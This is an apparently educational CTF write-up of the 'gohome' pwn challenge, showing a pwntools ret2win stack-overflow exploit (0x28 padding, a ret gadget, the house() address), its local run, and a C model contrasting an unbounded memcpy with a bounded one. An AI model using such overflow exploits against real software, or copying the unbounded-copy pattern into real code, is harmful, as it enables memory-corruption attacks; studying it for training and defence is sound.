Pwnctf gohome Writeup

kazma, founder/president of the NCKU Information Security Club

gohome

Run it and take a look:

gohome

It says we need to find the address of its home:

house

Found its home. Its body just prints our flag from a shell, so all we need is to return into it, with one extra `ret` to fix the stack alignment. exploit.py:

└─$ cat exploit.py
from pwn import *

context.arch = 'amd64'
r = process('./gohome')

house = 0x4006c6   # address of the house() function, which runs cat on the flag
ret = 0x400541     # a lone `ret` gadget: re-aligns the stack to 16 bytes before house is entered

# 0x28 bytes of filler reach the saved return address, then ret, then house
p = flat(
    b'a'*0x28,
    ret,
    house
)
r.sendlineafter(b'?', p)   # bytes delimiter avoids pwntools' BytesWarning
r.interactive()

Result:

└─$ python exploit.py
[+] Starting local process './gohome': pid 301052
/home/kazmatw/.local/lib/python3.11/site-packages/pwnlib/tubes/tube.py:841: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
res = self.recvuntil(delim, timeout=timeout)
[*] Switching to interactive mode
cat: /home/ctf/flag: No such file or directory
[*] Got EOF while reading in interactive

We can see that it ran cat /home/ctf/flag; since this is a local run and that directory does not exist, we simply hit EOF.

Pwned !!!
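To make the 0x28 offset concrete from the defender's side, here is an added C model (my own code, not the challenge's source, which is not on the page) of the frame the payload assumes: a 0x20-byte buffer, then the saved rbp, then the saved return address. It shows the unbounded copy that lets the payload above reach the saved return address, next to a bounded copy that cannot; the struct layout and buffer size are assumptions derived from the padding length, and a little-endian host is assumed.

```c
#include <stdint.h>
#include <string.h>

/* Frame layout assumed from the exploit's 0x28 bytes of padding: a 0x20-byte
 * buffer, then the saved rbp (8 bytes), then the saved return address. The
 * challenge's source is not on the page; this struct only models that frame. */
struct frame {
    char     buf[0x20];
    uint64_t saved_rbp;
    uint64_t saved_rip;
};

/* Vulnerable pattern: the copy length comes from the input, not the buffer,
 * so bytes past 0x20 land on saved_rbp and then on saved_rip. */
static void ask_vulnerable(struct frame *f, const char *in, size_t len) {
    memcpy(f->buf, in, len);
}

/* Hardened pattern: the copy is bounded by the buffer, so the rest of the
 * frame stays unreachable however long the input is. */
static void ask_hardened(struct frame *f, const char *in, size_t len) {
    if (len > sizeof f->buf)
        len = sizeof f->buf;
    memcpy(f->buf, in, len);
}

/* The page's payload: 0x28 filler bytes, the ret gadget, then house.
 * Addresses are written little-endian, as x86-64 and pwntools' flat() do. */
static size_t page_payload(unsigned char *out) {
    uint64_t words[2] = { 0x400541, 0x4006c6 };   /* ret gadget, house */
    memset(out, 'a', 0x28);
    for (int w = 0; w < 2; w++)
        for (int b = 0; b < 8; b++)
            out[0x28 + w * 8 + b] = (unsigned char)(words[w] >> (8 * b));
    return 0x28 + 16;
}

#define SENTINEL_RIP 0x1234567800000000ULL   /* stands in for the real return address */

/* Feed the payload to one copy routine and report what saved_rip holds afterwards. */
static uint64_t rip_after(void (*ask)(struct frame *, const char *, size_t)) {
    unsigned char payload[0x38];
    size_t len = page_payload(payload);
    struct frame f = { .saved_rbp = 0, .saved_rip = SENTINEL_RIP };
    ask(&f, (const char *)payload, len);
    return f.saved_rip;
}
```

With the unbounded copy, saved_rip ends up holding the ret gadget (0x400541) and the word after it holds house; with the bounded copy it keeps the sentinel.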

  • Title: Pwnctf gohome Writeup
  • Author: kazma
  • Created at: 2023-12-20 21:16:27
  • Updated at: 2023-12-20 21:25:57
  • Link: https://kazma.tw/2023/12/20/Pwnctf-gohome-Writeup/
  • License: This work is licensed under CC BY-NC-SA 4.0.